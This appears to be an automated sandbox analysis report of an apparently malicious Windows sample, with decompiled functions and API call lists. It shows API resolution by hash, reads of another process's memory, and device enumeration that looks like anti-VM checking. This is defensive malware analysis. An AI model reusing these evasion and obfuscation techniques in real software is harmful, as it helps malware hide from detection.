Part of subcall function 00417E60: GlobalAlloc.KERNEL32(00000042,00000000), ref: 00417FEA
Part of subcall function 00417E60: GlobalFix.KERNEL32(00000000), ref: 00417FF7
Part of subcall function 00417E60: GlobalUnWire.KERNEL32(00000000), ref: 00418012
Part of subcall function 00417E60: lstrlen.KERNEL32(00000000), ref: 00418031
Part of subcall function 00417E60: SetWindowLongA.USER32(?,000000EB,?), ref: 00418139
Part of subcall function 00417E60: NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00418176

CreateEventA.KERNEL32(00000000,00000000,00000000,00433E64), ref: 0041D577
GetCursorPos.USER32(00000005), ref: 0041D586
GetCursorPos.USER32(?), ref: 0041D5B8
DragQueryFile.SHELL32(00000000,000000FF,?,00000104), ref: 0041D5E1
CreateRectRgnIndirect.GDI32(?), ref: 0041D6AF
WaitForSingleObject.KERNEL32(?,00000BB6), ref: 0041D6ED
EnableMenuItem.USER32(?,0000000C,00000000), ref: 0041D74B
GetDlgItem.USER32(00000000,00442A98), ref: 0041D91F
OleInitialize.OLE32(00000000), ref: 0041D929
RegisterDragDrop.OLE32(00000000,00442AA0), ref: 0041D93E
GetTopWindow.USER32(00000000), ref: 0041D946
RevokeDragDrop.OLE32(00000000), ref: 0041D94D
OleUninitialize.OLE32 ref: 0041D96B
SetMenuItemInfoA.USER32 ref: 0041D9B2
GetLastError.KERNEL32 ref: 0041D9BC
DrawMenuBar.USER32(00000000), ref: 0041D9C5
GetMenuItemInfoA.USER32 ref: 0041D9FA
BeginPaint.USER32(00442AA8,?), ref: 0041DA0F
EndPaint.USER32(00442AA8,?), ref: 0041DA1E
GetClientRect.USER32 ref: 0041DA38
EnumDateFormatsA.KERNEL32(?,00000400,00000001), ref: 0041DA4D

Part of subcall function 004198E0: RtlEnterCriticalSection.NTDLL ref: 0041991C
Part of subcall function 004198E0: GetCurrentThreadId.KERNEL32 ref: 00419922
Part of subcall function 004198E0: RtlLeaveCriticalSection.NTDLL(00442A20), ref: 00419942
Part of subcall function 004198E0: InterlockedIncrement.KERNEL32(00442AE0), ref: 004199D7
Part of subcall function 004198E0: ShowWindow.USER32(?,?), ref: 004199EA

Sleep.KERNEL32(00442B20,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 0041DBB9

Strings

VUUU, xrefs: 0041CDF0
<XC, xrefs: 0041CA56
Y, xrefs: 0041CCDE
z, xrefs: 0041D452
LZC, xrefs: 0041DB7F
0, xrefs: 0041D45A
6, xrefs: 0041D273

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00406EEC, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 131
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406EEC(void* __ecx) {
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				CHAR* _v28;
				void* _v32;
				void* _v161;
				void* _v192;
				intOrPtr _t54;
				struct HINSTANCE__* _t57;

				_v8 = 0;
				_t54 =  *0x40a55c; // 0x406ed0
				_v28 = E00403F38(_t54);
				_t57 = LoadLibraryA(_v28); // executed
				_v12 = _t57;
				E00401440(_v28);
				if (_v12 == 0) goto L7;
			}

0x00406ef7
0x00406efa
0x00406f04
0x00406f0b
0x00406f11
0x00406f17
0x00406f20

APIs

LoadLibraryA.KERNELBASE(?), ref: 00406F0B

Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454

SetupDiGetClassDevsA.SETUPAPI(0040A014,00000000,00000000,00000002), ref: 00406F79
SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 00406FA7
SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,00000000,?,00000000,00000081,?), ref: 00406FCE
CharLowerBuffA.USER32(00000000,00000000), ref: 00406FE7
SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 00406FF1
SetupDiGetClassDevsA.SETUPAPI(0040A024,00000000,00000000,00000002), ref: 00407028
SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 00407056
SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,0000000C,?,00000000,00000081,?), ref: 0040707D
CharLowerBuffA.USER32(00000000,00000000), ref: 00407096
SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 004070A0

Strings

n@, xrefs: 00406FF7

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00404E94, Relevance: 3.0, APIs: 2, Instructions: 37
native

C-Code - Quality: 100%

			E00404E94(void* __eax) {
				void* _v8;
				intOrPtr _v12;
				long _v16;
				long _v20;
				void* _v24;
				void _v28;
				intOrPtr _v48;
				void _v52;

				_v8 = __eax;
				_v16 = NtQueryInformationProcess(_v8, 0,  &_v52, 0x18,  &_v20);
				if(_v16 == 0 && _v48 != 0) {
					_v24 = _v48 + 8;
					ReadProcessMemory(_v8, _v24,  &_v28, 4,  &_v20); // executed
					_v12 = _v28;
				}
				return _v12;
			}

0x00404e9a
0x00404eb3
0x00404eba
0x00404ec8
0x00404edd
0x00404ee6
0x00404ee6
0x00404eef

APIs

NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 00404EAD
ReadProcessMemory.KERNELBASE(?,?,?,00000004,?), ref: 00404EDD

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 0042CA48, Relevance: 1.5, APIs: 1, Instructions: 4

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0001CA06), ref: 0042CA4D

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 0042CA48, Relevance: 1.5, APIs: 1, Instructions: 4

C-Code - Quality: 100%

			E0042CA48() {

				SetUnhandledExceptionFilter(0x42ca06); // executed
				return 0;
			}

0x0042ca4d
0x0042ca55

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0002CA06), ref: 0042CA4D

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00409178, Relevance: .0, Instructions: 22

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00409147, Relevance: .0, Instructions: 21

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00402574, Relevance: 53.6, APIs: 14, Strings: 16, Instructions: 1068
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00402574(intOrPtr __eax) {
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				CHAR* _t492;
				CHAR* _t500;
				struct HINSTANCE__* _t564;
				CHAR* _t567;
				struct HINSTANCE__* _t568;
				CHAR* _t571;
				CHAR* _t587;
				CHAR* _t669;
				CHAR* _t677;
				CHAR* _t685;
				CHAR* _t693;
				CHAR* _t699;
				struct HINSTANCE__* _t700;
				CHAR* _t707;
				struct HINSTANCE__* _t708;
				intOrPtr _t712;
				CHAR* _t713;
				CHAR* _t755;

				_v8 = __eax;
				_v12 = E004024F8();
				 *0x40b11c = E00401994(_v12, 0xc8ac8026);
				 *0x40b120 = E00401994(_v12, 0x4b935b8e);
				 *0x40b1d0 = E00401994(_v12, 0x78b00c7e);
				 *0x40b144 = E00401994(_v12, 0x25447ac6);
				 *0x40b148 = E00401994(_v12, 0xf50b872);
				 *0x40b160 = E00401994(_v12, 0x9e6fa842);
				 *0x40b1bc = E00401994(_v12, 0x7d544dbd);
				 *0x40b124 = E00401994(_v12, 0x1fc0eaee);
				 *0x40b384 = E00401994(_v12, 0x270118e2);
				 *0x40b498 = E00401994(_v12, 0x4ae7572b);
				 *0x40b138 = E00401994(_v12, 0x81f0f0c9);
				 *0x40b140 = E00401994(_v12, 0x95fb6a02);
				 *0x40b334 = E00401994(_v12, 0x70f6fe31);
				 *0x40b338 = E00401994(_v12, 0x399354ce);
				 *0x40b128 = E00401994(_v12, 0xa45b370a);
				 *0x40b208 = E00401994(_v12, 0x2b00b870);
				 *0x40b1c4 = E00401994(_v12, 0x4fba916c);
				 *0x40b2a4 = E00401994(_v12, 0xc54374f3);
				 *0x40b2a0 = E00401994(_v12, 0x9c700049);
				 *0x40b29c = E00401994(_v12, 0x4f6ca717);
				 *0x40b2d8 = E00401994(_v12, 0x67ecde97);
				 *0x40b2dc = E00401994(_v12, 0xfdc94385);
				 *0x40b2e0 = E00401994(_v12, 0x68807354);
				 *0x40b2e4 = E00401994(_v12, 0x84d25ea);
				 *0x40b2e8 = E00401994(_v12, 0xfc7a6efd);
				 *0x40b2ec = E00401994(_v12, 0x5550b067);
				 *0x40b2f0 = E00401994(_v12, 0xaebea6a);
				 *0x40b12c = E00401994(_v12, 0x46318ac7);
				 *0x40b130 = E00401994(_v12, 0x49a1374a);
				 *0x40b134 = E00401994(_v12, 0xae17c571);
				 *0x40b150 = E00401994(_v12, 0xe61874b3);
				 *0x40b154 = E00401994(_v12, 0x3a7a7478);
				 *0x40b158 = E00401994(_v12, 0x533d3b41);
				 *0x40b15c = E00401994(_v12, 0x99a4299d);
				 *0x40b164 = E00401994(_v12, 0xbea0bf35);
				 *0x40b168 = E00401994(_v12, 0x9d00a761);
				 *0x40b188 = E00401994(_v12, 0x9abfb8a6);
				 *0x40b194 = E00401994(_v12, 0x6b416786);
				 *0x40b198 = E00401994(_v12, 0x774393e8);
				 *0x40b19c = E00401994(_v12, 0x2ee4f10d);
				 *0x40b1a0 = E00401994(_v12, 0x19f78c90);
				 *0x40b1a4 = E00401994(_v12, 0xd89ad05);
				 *0x40b1a8 = E00401994(_v12, 0xc930ea1e);
				 *0x40b18c = E00401994(_v12, 0x5bc1d14f);
				 *0x40b1e0 = E00401994(_v12, 0x77cd9567);
				 *0x40b1f0 = E00401994(_v12, 0x32432444);
				 *0x40b1f4 = E00401994(_v12, 0x279dead7);
				 *0x40b1f8 = E00401994(_v12, 0x7b4842c1);
				 *0x40b1fc = E00401994(_v12, 0xae52c609);
				 *0x40b200 = E00401994(_v12, 0xbf78969c);
				 *0x40b204 = E00401994(_v12, 0xbb74a4a2);
				 *0x40b22c = E00401994(_v12, 0x464871f3);
				 *0x40b190 = E00401994(_v12, 0x9bd6888f);
				 *0x40b20c = E00401994(_v12, 0x5c17ec75);
				 *0x40b210 = E00401994(_v12, 0x58fe7abe);
				 *0x40b254 = E00401994(_v12, 0x768aa260);
				 *0x40b25c = E00401994(_v12, 0xef0a25b7);
				 *0x40b260 = E00401994(_v12, 0xbc262395);
				 *0x40b264 = E00401994(_v12, 0xe8bf6dad);
				 *0x40b268 = E00401994(_v12, 0x5cd9430);
				 *0x40b26c = E00401994(_v12, 0xaef7cbf1);
				 *0x40b274 = E00401994(_v12, 0x475587b7);
				 *0x40b278 = E00401994(_v12, 0x3def91ba);
				 *0x40b408 = E00401994(_v12, 0xda81bc58);
				 *0x40b40c = E00401994(_v12, 0xf3b84f05);
				 *0x40b410 = E00401994(_v12, 0x392b6027);
				 *0x40b414 = E00401994(_v12, 0x7b2d2505);
				 *0x40b314 = E00401994(_v12, 0xeeba5eba);
				 *0x40b2a8 = E00401994(_v12, 0x89b968d2);
				 *0x40b2c0 = E00401994(_v12, 0x7e92ca65);
				 *0x40b2f4 = E00401994(_v12, 0x4c1077d6);
				 *0x40b31c = E00401994(_v12, 0x84033deb);
				 *0x40b320 = E00401994(_v12, 0x725cb0a1);
				 *0x40b250 = E00401994(_v12, 0x52ac19c);
				 *0x40b318 = E00401994(_v12, 0x23ebe98b);
				 *0x40b464 = E00401994(_v12, 0x3b3ee0f9);
				 *0x40b468 = E00401994(_v12, 0x8d5a50dc);
				 *0x40b46c = E00401994(_v12, 0x8d5a50ca);
				 *0x40b470 = E00401994(_v12, 0x5e7ee0d0);
				 *0x40b474 = E00401994(_v12, 0x69260152);
				 *0x40b478 = E00401994(_v12, 0x9c480e24);
				 *0x40b47c = E00401994(_v12, 0x5aa7e70b);
				 *0x40b488 = E00401994(_v12, 0xe74f57ee);
				 *0x40b48c = E00401994(_v12, 0x2d40b8f0);
				 *0x40b490 = E00401994(_v12, 0xae17c071);
				 *0x40b494 = E00401994(_v12, 0x515be757);
				 *0x40b49c = E00401994(_v12, 0x1297812c);
				 *0x40b4a0 = E00401994(_v12, 0x2f2feeda);
				 *0x40b4a4 = E00401994(_v12, 0x81f0f0df);
				 *0x40b4a8 = E00401994(_v12, 0xf3fd1c3);
				 *0x40b4ac = E00401994(_v12, 0xef48e03a);
				 *0x40b4b0 = E00401994(_v12, 0xfb0730c);
				 *0x40b4b4 = E00401994(_v12, 0xa9de6f5a);
				 *0x40b4b8 = E00401994(_v12, 0x723eb0d5);
				 *0x40b4bc = E00401994(_v12, 0x487fe16b);
				 *0x40b4c0 = E00401994(_v12, 0x8f8f114);
				 *0x40b4c4 = E00401994(_v12, 0x3d9972f5);
				 *0x40b4c8 = E00401994(_v12, 0x6fb89af0);
				 *0x40b4cc = E00401994(_v12, 0xc09d5d66);
				 *0x40b4d0 = E00401994(_v12, 0x2ca2b7e6);
				 *0x40b4d4 = E00401994(_v12, 0x7b88bf3b);
				 *0x40b4d8 = E00401994(_v12, 0xaa1de02f);
				 *0x40b4dc = E00401994(_v12, 0xa48d6762);
				 *0x40b4e0 = E00401994(_v12, 0x3a35705f);
				 *0x40b4e8 = E00401994(_v12, 0x697a6afe);
				 *0x40b4ec = E00401994(_v12, 0x95902b19);
				 *0x40b4f0 = E00401994(_v12, 0x1295012c);
				 *0x40b4f4 = E00401994(_v12, 0x2891ae7a);
				 *0x40b4f8 = E00401994(_v12, 0x831a3927);
				 *0x40b23c = E00401994(_v12, 0xd0498cd4);
				 *0x40c22c = E00401994(_v12, 0xd0498cc2);
				_t492 =  *0x40a084; // 0x401bf0
				_v12 = LoadLibraryA(_t492);
				 *0x40b230 = E00401994(_v12, 0xa638ce5f);
				 *0x40b234 = E00401994(_v12, 0xbc44a131);
				 *0x40b238 = E00401994(_v12, 0xf6edf382);
				_t500 =  *0x40a080; // 0x401be8
				_v12 = LoadLibraryA(_t500);
				 *0x40b2fc = E00401994(_v12, 0x1ab922bf);
				 *0x40b2f8 = E00401994(_v12, 0xa8afd1f3);
				 *0x40b300 = E00401994(_v12, 0xc6ce9b8a);
				 *0x40b304 = E00401994(_v12, 0xf26817eb);
				 *0x40b308 = E00401994(_v12, 0x7506e960);
				 *0x40b30c = E00401994(_v12, 0xbf7efb5a);
				 *0x40b310 = E00401994(_v12, 0x4baed1c8);
				 *0x40b484 = E00401994(_v12, 0x7396104b);
				 *0x40b480 = E00401994(_v12, 0xb800c8a6);
				 *0x40b388 = E00401994(_v12, 0x8616ab9b);
				 *0x40b38c = E00401994(_v12, 0xb4584dda);
				 *0x40b1b4 = E00401994(_v12, 0x6c7f716f);
				 *0x40b1b0 = E00401994(_v12, 0x252b53b);
				 *0x40b2ac = E00401994(_v12, 0xd36ceaf0);
				 *0x40b2b0 = E00401994(_v12, 0xd7a87c3a);
				 *0x40b2b4 = E00401994(_v12, 0xc45d9631);
				 *0x40b2b8 = E00401994(_v12, 0x4baed1de);
				 *0x40b2bc = E00401994(_v12, 0x8ebef5b1);
				 *0x40b270 = E00401994(_v12, 0xea3af0d7);
				 *0x40b418 = E00401994(_v12, 0x484007c);
				 *0x40b41c = E00401994(_v12, 0x58a81c29);
				 *0x40b420 = E00401994(_v12, 0xcacd450);
				 *0x40b424 = E00401994(_v12, 0xabbc680d);
				 *0x40b42c = E00401994(_v12, 0x7cbd2247);
				 *0x40b428 = E00401994(_v12, 0xbdb70517);
				 *0x40b430 = E00401994(_v12, 0x1d6c998b);
				 *0x40b434 = E00401994(_v12, 0xa2f65ba2);
				 *0x40b438 = E00401994(_v12, 0xad4ffcd5);
				 *0x40b43c = E00401994(_v12, 0xc8a274ac);
				 *0x40b440 = E00401994(_v12, 0x5fda1871);
				 *0x40b444 = E00401994(_v12, 0xc0d4187d);
				_t564 = LoadLibraryA("Psapi"); // executed
				_v12 = _t564;
				 *0x40b4e4 = E00401994(_v12, 0x860331a8);
				_t567 =  *0x40a0a4; // 0x401c40
				_t568 = LoadLibraryA(_t567); // executed
				_v12 = _t568;
				 *0x40b178 = E00401994(_v12, 0xa60c5f05);
				_t571 =  *0x40a0d0; // 0x401cac
				_v12 = LoadLibraryA(_t571);
				 *0x40b3ec = E00401994(_v12, 0x5af0017c);
				 *0x40b3f0 = E00401994(_v12, 0x5e10f525);
				 *0x40b3f4 = E00401994(_v12, 0x48b87efc);
				 *0x40b3f8 = E00401994(_v12, 0xdf91a857);
				 *0x40b3fc = E00401994(_v12, 0x9e90b462);
				 *0x40b400 = E00401994(_v12, 0x4894dafc);
				 *0x40b404 = E00401994(_v12, 0x59012669);
				_t587 =  *0x40a0e0; // 0x401d08
				_v12 = LoadLibraryA(_t587);
				 *0x40b330 = E00401994(_v12, 0xb9d41c2f);
				 *0x40b1b8 = E00401994(_v12, 0xb96ca1c0);
				 *0x40b1c0 = E00401994(_v12, 0x28e9e291);
				 *0x40b1c8 = E00401994(_v12, 0x1d1f334a);
				 *0x40b1cc = E00401994(_v12, 0x5cb5ef72);
				 *0x40b2c8 = E00401994(_v12, 0xce303c3a);
				 *0x40b2c4 = E00401994(_v12, 0x3e68cfc6);
				 *0x40b2cc = E00401994(_v12, 0xd4ecc759);
				 *0x40b2d0 = E00401994(_v12, 0xd21e3d01);
				 *0x40b2d4 = E00401994(_v12, 0xad0c9f7e);
				 *0x40b4fc = E00401994(_v12, 0x8ad7de34);
				 *0x40b500 = E00401994(_v12, 0x78660dbe);
				 *0x40b504 = E00401994(_v12, 0xcebf13be);
				 *0x40b508 = E00401994(_v12, 0xd4b3d42);
				 *0x40b50c = E00401994(_v12, 0x72760bb8);
				 *0x40b448 = E00401994(_v12, 0x3c4de260);
				 *0x40b44c = E00401994(_v12, 0xf837a387);
				 *0x40b450 = E00401994(_v12, 0xc3f46335);
				 *0x40b454 = E00401994(_v12, 0xa5ffa46e);
				 *0x40b458 = E00401994(_v12, 0x453db143);
				 *0x40b45c = E00401994(_v12, 0x37a53419);
				 *0x40b460 = E00401994(_v12, 0xcebf17e6);
				 *0x40b17c = E00401994(_v12, 0xaad67ff8);
				 *0x40b180 = E00401994(_v12, 0x3ef2d3dd);
				 *0x40b184 = E00401994(_v12, 0x90a097e6);
				 *0x40b16c = E00401994(_v12, 0x7a2167dc);
				 *0x40b170 = E00401994(_v12, 0x1b3d12b9);
				 *0x40b174 = E00401994(_v12, 0x80dbbe07);
				 *0x40b1ac = E00401994(_v12, 0x398c5285);
				 *0x40b1dc = E00401994(_v12, 0x560c7c4a);
				 *0x40b1d8 = E00401994(_v12, 0xdb355534);
				 *0x40b1d4 = E00401994(_v12, 0x3e400fd6);
				 *0x40b1e4 = E00401994(_v12, 0xee6ab5d);
				 *0x40b1e8 = E00401994(_v12, 0x1802e7c8);
				 *0x40b1ec = E00401994(_v12, 0xf65a7d95);
				 *0x40b224 = E00401994(_v12, 0xb8538a52);
				 *0x40b228 = E00401994(_v12, 0xccd03c3a);
				 *0x40b328 = E00401994(_v12, 0x6d523bdd);
				 *0x40b32c = E00401994(_v12, 0xf2f9de08);
				 *0x40b324 = E00401994(_v12, 0xce30283a);
				_t669 =  *0x40a094; // 0x401c20
				_v12 = LoadLibraryA(_t669);
				 *0x40b214 = E00401994(_v12, 0x3caa9945);
				 *0x40b218 = E00401994(_v12, 0x5a56b493);
				 *0x40b258 = E00401994(_v12, 0x7dfb3ef0);
				_t677 =  *0x40a088; // 0x401bf8
				_v12 = LoadLibraryA(_t677);
				 *0x40b14c = E00401994(_v12, 0xf2276995);
				 *0x40b21c = E00401994(_v12, 0xc95d8550);
				 *0x40b220 = E00401994(_v12, 0x570bc899);
				_t685 =  *0x40a098; // 0x401c28
				_v12 = LoadLibraryA(_t685);
				 *0x40b27c = E00401994(_v12, 0x368435be);
				 *0x40b280 = E00401994(_v12, 0xf341d5cf);
				 *0x40b284 = E00401994(_v12, 0xedb3159d);
				_t693 =  *0x40a1b8; // 0x401eec
				_v12 = LoadLibraryA(_t693);
				 *0x40b288 = E00401994(_v12, 0x3184919f);
				 *0x40b28c = E00401994(_v12, 0x39aedd1b);
				_t699 =  *0x40a0a0; // 0x401c38
				_t700 = LoadLibraryA(_t699); // executed
				_v12 = _t700;
				 *0x40b290 = E00401994(_v12, 0x8a94f707);
				 *0x40b294 = E00401994(_v12, 0x7aa45c7a);
				 *0x40b298 = E00401994(_v12, 0x4e26c00f);
				_t707 =  *0x40a0cc; // 0x401ca4
				_t708 = LoadLibraryA(_t707); // executed
				_v12 = _t708;
				 *0x40b33c = E00401994(_v12, 0x233e6d0f);
				_t712 = E00401994(_v12, 0xbf821ad);
				 *0x40b340 = _t712;
				if(_v8 != 0) {
					_t713 =  *0x40a1b0; // 0x401edc
					_v12 = LoadLibraryA(_t713);
					 *0x40b34c = E00401994(_v12, 0xd939f838);
					 *0x40b344 = E00401994(_v12, 0x9400a044);
					 *0x40b348 = E00401994(_v12, 0xee9bf475);
					 *0x40b3a4 = E00401994(_v12, 0xe797764);
					 *0x40b3a8 = E00401994(_v12, 0xedd8fe8a);
					 *0x40b3ac = E00401994(_v12, 0xe5971f6);
					 *0x40b3b0 = E00401994(_v12, 0x5d99726a);
					 *0x40b3b4 = E00401994(_v12, 0x1f935b1d);
					 *0x40b3b8 = E00401994(_v12, 0xfc7af16a);
					 *0x40b3bc = E00401994(_v12, 0x939d7d9c);
					 *0x40b3c0 = E00401994(_v12, 0xcdde757d);
					 *0x40b3c4 = E00401994(_v12, 0xc5a7764);
					 *0x40b3c8 = E00401994(_v12, 0x9e7d3188);
					 *0x40b3cc = E00401994(_v12, 0x3c797b7a);
					 *0x40b3d0 = E00401994(_v12, 0x4dfc1f3b);
					 *0x40b3d4 = E00401994(_v12, 0x8e9bf775);
					 *0x40b3d8 = E00401994(_v12, 0x8fb8b5bd);
					 *0x40b3dc = E00401994(_v12, 0xb909d088);
					 *0x40b3e0 = E00401994(_v12, 0xf44318c6);
					 *0x40b3e4 = E00401994(_v12, 0x95e4a5d7);
					_t755 =  *0x40a1b4; // 0x401ee4
					_v12 = LoadLibraryA(_t755);
					 *0x40b13c = E00401994(_v12, 0xaa91290b);
					 *0x40b350 = E00401994(_v12, 0x8593dd7);
					 *0x40b354 = E00401994(_v12, 0x6ae49924);
					 *0x40b358 = E00401994(_v12, 0x7314fb0c);
					 *0x40b35c = E00401994(_v12, 0xb87dbd66);
					 *0x40b360 = E00401994(_v12, 0x2f5ce027);
					 *0x40b364 = E00401994(_v12, 0xa3a80ab6);
					 *0x40b368 = E00401994(_v12, 0xddcb15d);
					 *0x40b36c = E00401994(_v12, 0x8733d614);
					 *0x40b370 = E00401994(_v12, 0xfde87743);
					 *0x40b390 = E00401994(_v12, 0x1a212962);
					 *0x40b394 = E00401994(_v12, 0x9f13856a);
					 *0x40b398 = E00401994(_v12, 0xbe618d3e);
					 *0x40b39c = E00401994(_v12, 0x1510002f);
					 *0x40b3a0 = E00401994(_v12, 0x7edec584);
					 *0x40b380 = E00401994(_v12, 0xaa912901);
					 *0x40b374 = E00401994(_v12, 0x2ae71934);
					 *0x40b378 = E00401994(_v12, 0x1ad09c78);
					 *0x40b37c = E00401994(_v12, 0x9ef6461);
					_t712 = E00401994(_v12, 0x57fbc0dd);
					 *0x40b3e8 = _t712;
				}
				return _t712;
			}

0x0040257a
0x00402582
0x00402592
0x004025a4
0x004025b6
0x004025c8
0x004025da
0x004025ec
0x004025fe
0x00402610
0x00402622
0x00402634
0x00402646
0x00402658
0x0040266a
0x0040267c
0x0040268e
0x004026a0
0x004026b2
0x004026c4
0x004026d6
0x004026e8
0x004026fa
0x0040270c
0x0040271e
0x00402730
0x00402742
0x00402754
0x00402766
0x00402778
0x0040278a
0x0040279c
0x004027ae
0x004027c0
0x004027d2
0x004027e4
0x004027f6
0x00402808
0x0040281a
0x0040282c
0x0040283e
0x00402850
0x00402862
0x00402874
0x00402886
0x00402898
0x004028aa
0x004028bc
0x004028ce
0x004028e0
0x004028f2
0x00402904
0x00402916
0x00402928
0x0040293a
0x0040294c
0x0040295e
0x00402970
0x00402982
0x00402994
0x004029a6
0x004029b8
0x004029ca
0x004029dc
0x004029ee
0x00402a00
0x00402a12
0x00402a24
0x00402a36
0x00402a48
0x00402a5a
0x00402a6c
0x00402a7e
0x00402a90
0x00402aa2
0x00402ab4
0x00402ac6
0x00402ad8
0x00402aea
0x00402afc
0x00402b0e
0x00402b20
0x00402b32
0x00402b44
0x00402b56
0x00402b68
0x00402b7a
0x00402b8c
0x00402b9e
0x00402bb0
0x00402bc2
0x00402bd4
0x00402be6
0x00402bf8
0x00402c0a
0x00402c1c
0x00402c2e
0x00402c40
0x00402c52
0x00402c64
0x00402c76
0x00402c88
0x00402c9a
0x00402cac
0x00402cbe
0x00402cd0
0x00402ce2
0x00402cf4
0x00402d06
0x00402d18
0x00402d2a
0x00402d3c
0x00402d4e
0x00402d53
0x00402d5f
0x00402d6f
0x00402d81
0x00402d93
0x00402d98
0x00402da4
0x00402db4
0x00402dc6
0x00402dd8
0x00402dea
0x00402dfc
0x00402e0e
0x00402e20
0x00402e32
0x00402e44
0x00402e56
0x00402e68
0x00402e7a
0x00402e8c
0x00402e9e
0x00402eb0
0x00402ec2
0x00402ed4
0x00402ee6
0x00402ef8
0x00402f0a
0x00402f1c
0x00402f2e
0x00402f40
0x00402f52
0x00402f64
0x00402f76
0x00402f88
0x00402f9a
0x00402fac
0x00402fbe
0x00402fd0
0x00402fda
0x00402fe0
0x00402ff0
0x00402ff5
0x00402ffb
0x00403001
0x00403011
0x00403016
0x00403022
0x00403032
0x00403044
0x00403056
0x00403068
0x0040307a
0x0040308c
0x0040309e
0x004030a3
0x004030af
0x004030bf
0x004030d1
0x004030e3
0x004030f5
0x00403107
0x00403119
0x0040312b
0x0040313d
0x0040314f
0x00403161
0x00403173
0x00403185
0x00403197
0x004031a9
0x004031bb
0x004031cd
0x004031df
0x004031f1
0x00403203
0x00403215
0x00403227
0x00403239
0x0040324b
0x0040325d
0x0040326f
0x00403281
0x00403293
0x004032a5
0x004032b7
0x004032c9
0x004032db
0x004032ed
0x004032ff
0x00403311
0x00403323
0x00403335
0x00403347
0x00403359
0x0040336b
0x0040337d
0x00403382
0x0040338e
0x0040339e
0x004033b0
0x004033c2
0x004033c7
0x004033d3
0x004033e3
0x004033f5
0x00403407
0x0040340c
0x00403418
0x00403428
0x0040343a
0x0040344c
0x00403451
0x0040345d
0x0040346d
0x0040347f
0x00403484
0x0040348a
0x00403490
0x004034a0
0x004034b2
0x004034c4
0x004034c9
0x004034cf
0x004034d5
0x004034e5
0x004034f2
0x004034f7
0x00403500
0x00403506
0x00403512
0x00403522
0x00403534
0x00403546
0x00403558
0x0040356a
0x0040357c
0x0040358e
0x004035a0
0x004035b2
0x004035c4
0x004035d6
0x004035e8
0x004035fa
0x0040360c
0x0040361e
0x00403630
0x00403642
0x00403654
0x00403666
0x00403678
0x0040367d
0x00403689
0x00403699
0x004036ab
0x004036bd
0x004036cf
0x004036e1
0x004036f3
0x00403705
0x00403717
0x00403729
0x0040373b
0x0040374d
0x0040375f
0x00403771
0x00403783
0x00403795
0x004037a7
0x004037b9
0x004037cb
0x004037dd
0x004037ea
0x004037ef
0x004037ef
0x00403858

APIs

LoadLibraryA.KERNEL32(00401BF0), ref: 00402D59
LoadLibraryA.KERNEL32(00401BE8), ref: 00402D9E
LoadLibraryA.KERNELBASE(Psapi), ref: 00402FDA
LoadLibraryA.KERNELBASE(00401C40), ref: 00402FFB
